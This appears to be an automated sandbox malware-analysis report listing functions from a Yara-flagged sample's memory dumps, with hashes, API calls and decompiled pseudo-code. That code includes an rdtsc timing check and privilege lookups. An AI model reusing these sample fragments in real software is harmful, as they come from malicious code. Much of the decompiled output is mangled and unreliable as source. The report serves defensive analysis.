                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                  • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                  • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                  • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                  • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                  • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                  • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                  • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                  • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                  • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                  • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                  • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                  • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                  • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                  • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                  • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                  • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                  • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                  • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004088D0, Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E004088D0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E20(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407030( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A0F0( &_v284, 0x104);
						E0041A760( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DF0(E00413D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407060( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070E0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                  0x004088db
                                                  0x004088e3
                                                  0x004088e5
                                                  0x004088ea
                                                  0x004088ef
                                                  0x00408902
                                                  0x00408907
                                                  0x00408910
                                                  0x0040891c
                                                  0x0040892f
                                                  0x00408934
                                                  0x00408937
                                                  0x00408940
                                                  0x00408952
                                                  0x00408957
                                                  0x0040895c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040895e
                                                  0x00408962
                                                  0x00000000
                                                  0x00000000
                                                  0x00408964
                                                  0x00000000
                                                  0x00408962
                                                  0x00408966
                                                  0x00408969
                                                  0x0040896f
                                                  0x00408971
                                                  0x0040897c
                                                  0x00408981
                                                  0x00408984
                                                  0x00408991
                                                  0x0040899c
                                                  0x0040899e
                                                  0x004089a4
                                                  0x004089a8
                                                  0x004089ab
                                                  0x004089ab
                                                  0x004089b2
                                                  0x004089b5
                                                  0x004089ba
                                                  0x004089c7
                                                  0x004088f6
                                                  0x004088f6
                                                  0x004088f6

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                                  • Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
                                                  • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                                  • Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00418876, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 17%
                                                  			E00418876(void* __eax, void* __ebx, intOrPtr __edx, void* __esi, void* _a1, intOrPtr _a4, intOrPtr _a8, char _a12, long _a16, long _a20) {
				intOrPtr* _t17;
				void* _t24;
				signed char _t28;
				void* _t34;
				signed char* _t37;
				void* _t42;
				intOrPtr* _t45;

				_t31 = __edx;
				_t17 = __eax + 1;
				_t45 = _t17;
				if(_t45 < 0) {
					L4:
					return  *_t28(_t17, _t31);
				} else {
					if(_t45 < 0) {
						 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | _t28;
						 *((intOrPtr*)(_t28 - 0x73)) =  *((intOrPtr*)(_t28 - 0x73)) + __edx;
						 *((intOrPtr*)(__esi + 0x50)) =  *((intOrPtr*)(__esi + 0x50)) + __edx;
						E004191E0(_t34);
						_t15 =  &_a12; // 0x413536
						_t24 = RtlAllocateHeap( *_t15, _a16, _a20);
						asm("rcr byte [esi+0x5d], cl");
						return _t24;
					} else {
						_t42 = _t42 +  *((intOrPtr*)(__edx + 0x7f));
						 *_t17 =  *_t17 - _t17;
						_t25 = _a4;
						_push(__esi);
						_t4 = _t25 + 0xc6c; // 0xc6e
						_t37 = _t4;
						E004191E0(_t34, _a4, _t37,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x33);
						_t31 = _a12;
						_t17 = _a8;
						_t28 =  *_t37;
						goto L4;
					}
				}
			}










                                                  0x00418876
                                                  0x00418876
                                                  0x00418876
                                                  0x00418877
                                                  0x004188a4
                                                  0x004188ad
                                                  0x00418879
                                                  0x00418879
                                                  0x004188b5
                                                  0x004188bd
                                                  0x004188c4
                                                  0x004188c7
                                                  0x004188d2
                                                  0x004188dd
                                                  0x004188de
                                                  0x004188e1
                                                  0x0041887b
                                                  0x0041887b
                                                  0x0041887e
                                                  0x00418883
                                                  0x00418889
                                                  0x0041888f
                                                  0x0041888f
                                                  0x00418897
                                                  0x0041889c
                                                  0x0041889f
                                                  0x004188a2
                                                  0x00000000
                                                  0x004188a2
                                                  0x00418879

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID: 65A
                                                  • API String ID: 1279760036-2085483392
                                                  • Opcode ID: 746ff5edee9ba1c32609ad17696e619fc5e46625752bd9efdbcf08bfbe1a81cb
                                                  • Instruction ID: 1ac7946acf61a3e344ddf0efaa91ffd21b9feb6a210cd0ef52aa411d33364191
                                                  • Opcode Fuzzy Hash: 746ff5edee9ba1c32609ad17696e619fc5e46625752bd9efdbcf08bfbe1a81cb
                                                  • Instruction Fuzzy Hash: 2AF055F65083801FDB00EB78ACC58EB3B94AFC0308704058FE85C43203E925D864C3B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004188B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID: 65A
                                                  • API String ID: 1279760036-2085483392
                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                  • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                  • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 82%
                                                  			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A140( &_v67, 0, 0x3f);
				E0041AD20( &_v68, 3);
				_t12 = E00409B40(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092A0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                  0x00407280
                                                  0x0040728f
                                                  0x00407293
                                                  0x0040729e
                                                  0x004072ae
                                                  0x004072be
                                                  0x004072c3
                                                  0x004072ca
                                                  0x004072cd
                                                  0x004072da
                                                  0x004072dc
                                                  0x004072de
                                                  0x004072fb
                                                  0x004072fb
                                                  0x00000000
                                                  0x004072fd
                                                  0x00407302

                                                  APIs
                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                  • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                                                  • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                  • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00418922, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418958
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: f98b6dc37f4e98863ce5433d635178352fae0d1445aa1f484ab18bee9ef67b31
                                                  • Instruction ID: 0cc61aada73a278af27b10ed5625c7db8e916522e96b75ac380f4d0e6699329f
                                                  • Opcode Fuzzy Hash: f98b6dc37f4e98863ce5433d635178352fae0d1445aa1f484ab18bee9ef67b31
                                                  • Instruction Fuzzy Hash: 271170B1208145AFCB10CF68DC80DDB7BA8AF8C314B14864DF95997242C634E951CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00418A85, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: 37087e82f7051e5ac04932086f1789566a94f37bda58a1aca5d3ce74193ea33f
                                                  • Instruction ID: 290b3b156e5cf8a1ee1e47c3abb52f905dc544215f3cd5d4bdaaaa24adac2687
                                                  • Opcode Fuzzy Hash: 37087e82f7051e5ac04932086f1789566a94f37bda58a1aca5d3ce74193ea33f
                                                  • Instruction Fuzzy Hash: 8EE068780442819BCB10EF68E8C09E777A4EFC4324320868FF81C47302C738D86ACBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004188E4, Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 99f2e2ce6b40ccc3fca39f7e53184e295c7f2719128b50548e3c85bae877a03a
                                                  • Instruction ID: 980f183638a73f9381344b97f7f6b6de127065a2de1cec76140ea31d563db294
                                                  • Opcode Fuzzy Hash: 99f2e2ce6b40ccc3fca39f7e53184e295c7f2719128b50548e3c85bae877a03a
                                                  • Instruction Fuzzy Hash: FDE022B81042826FDB10EA79D98089F3BC5AF812647109F5AE8A947283C438D49987B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004188F0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004188F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                  0x004188ff
                                                  0x00418907
                                                  0x0041891d
                                                  0x00418921

                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                  • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                  • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00418A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                  • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                  • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00418930, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00418930(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191E0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                  0x00418933
                                                  0x0041894a
                                                  0x00418958

                                                  APIs
                                                  • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418958
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                  • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                  • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 00406AB5, Relevance: .0, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00406AB5(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {

				return 1;
			}



                                                  0x00406ad4

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 94a5c8fc9376e93e698026e3a4800c6d67a5e004f2d7c045d3b1134ad71e8e46
                                                  • Instruction ID: 9a949dca6b62fb9d6e02a470b85db65025d4dfc9e2b59fc0bcd28496de79468b
                                                  • Opcode Fuzzy Hash: 94a5c8fc9376e93e698026e3a4800c6d67a5e004f2d7c045d3b1134ad71e8e46
                                                  • Instruction Fuzzy Hash: FDC08C32A212294AE2281F2CF8406B2FBA8DB0B224F0023A7E848670025292D0A68549
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00415680, Relevance: .0, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 25%
                                                  			E00415680(void* __eax, void* __ecx, signed int __esi) {

				asm("bound edx, [eax]");
				asm("fisubr dword [ebx-0x1a]");
				 *(__ecx - 0x7c0cc625) =  *(__ecx - 0x7c0cc625) ^ __esi;
				asm("cdq");
				return __eax;
			}



                                                  0x00415680
                                                  0x00415682
                                                  0x00415685
                                                  0x0041568b
                                                  0x00415696

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3cd2ab0a09804b2f07651b53475733e6a4436bfa0969106cd4b91a930ccbff49
                                                  • Instruction ID: 5fdcd232b1879c0fb3131198c10f3b2138b94083a643b516561e1a98ac69d588
                                                  • Opcode Fuzzy Hash: 3cd2ab0a09804b2f07651b53475733e6a4436bfa0969106cd4b91a930ccbff49
                                                  • Instruction Fuzzy Hash: E1C04C73D060554F86288E24F9865B6F375EE8B629B1032DBD914AF4148622D021C6DC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00750060, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                  • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                  • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                  • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 007510D0, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
